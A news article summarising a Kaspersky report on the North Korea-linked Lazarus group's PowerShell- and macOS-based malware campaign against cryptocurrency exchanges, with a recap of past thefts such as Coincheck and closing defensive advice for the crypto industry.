Lazarus APT Group (alias Hidden Kobra) is aiming again for a cyber-attack on financial entities, especially targeting cryptocurrency exchanges which they had done it in 2017-2018 while hacking Coincheck. The detailed report published by Kaspersky Lab, cybersecurity and anti-virus company on March 26.
Lazarus is a cybercrime group comprised of an unknown number of individuals. Not many facts are available about the Lazarus Group, however, researchers have attributed many cyber-attacks to them over the last decade.
Allegedly, North Korea backed Lazarus at present discovered by Kaspersky while tracking the group activities is effectively functioning on new operations, since Nov 2018, and seeking ways to harm the cryptocurrency investors.
Deployment Of PowerShell In Hacking
While using “PowerShell”, which is an automated task framework from Microsoft or a task-based command-line shell and scripting language that is built on .NET, the hackers are aiming something big this time. PowerShell is managed by the well-versed developers to automate tasks for operating systems (Linux, macOS, and Windows) and processes. In order to collect the basic host information, the group is deploying this infectious procedure, and “developed custom PowerShell scripts to execute commands from the operator and frame their target that interacts with C2 malicious servers.”
Kasper report further communicates, the notorious unit is using well-known and trendy open source projects and WordPress file (a blog engine) to conceal their C2 server scripts. Purportedly, once the malware control session is established, the downloading and uploading process starts automatically by the malware or trojan virus.
These are some assorted functionality can be seen: Set sleep time (delay between C2 interactions), exit malware, collect basic host information, check malware status, show current malware configuration, update malware configuration, execute a system shell command, and last but, not least, download & upload files.
Due to the increasing popularity of distinguished Apple products amongst various fintech firms and successful internet businesses, the bad actors are taking benefits of macOS malware because of users choice and their behavior towards the brand acceptance. The infamous and experienced group is manipulating users while exploiting the brand image as well.
During 2017–2018, apparently, Lazarus was also found accountable for stealing of almost 65 percent of funds which was worth of approx.. $571 million out of $882 million cryptocurrencies from online exchanges.
It is also important to note that out of 14 individual exchange violations, five were committed by the group. The most controversial example among them is the largest and shabby theft of Japan’s Coincheck which broke all the past records in the industry’s history. Purportedly, that time almost $532 million NEM were lost.
It is not still cloudy who is really behind the group, but corroborated media reports have indicated a strong connection between the group and North Korea. Besides the current investigation, in 2017, Kaspersky Lab revealed about the predictable tendency of spying and infiltration cyber-attacking acts of the group. It is also found that a sub-group within their organization, which Kaspersky called Bluenoroff, specialized in financial cyber-attacks.
The cybersecurity and anti-virus company located multiple attacks internationally and a direct link (IP address) between Bluenoroff and North Korea.
Reportedly, from 2015 to 2018, North Korea has accumulated over $670 million in fiat and cryptocurrencies through hacking demeanors, and allegedly, infected worldwide financial institutions while using blockchain technology including various interfaces in disguise, and
Kaspersky through its observation advising investors, traders, crypto focussed businesses, and the entire fintech and cryptocurrency community to get attentive, avoid negligence, and apply prudence to avert hefty losses.
The reports also reads: People can use popular free virus-scanning services such as VirusTotalto exercise extra caution.
The report says, “Those who are the part of booming cryptocurrency industry or technological startups, extra caution is required when dealing with new third parties or installing software on the systems. Under any circumstances never ‘Enable Content’ (macro scripting) in Microsoft Office documents received from new or untrusted sources…”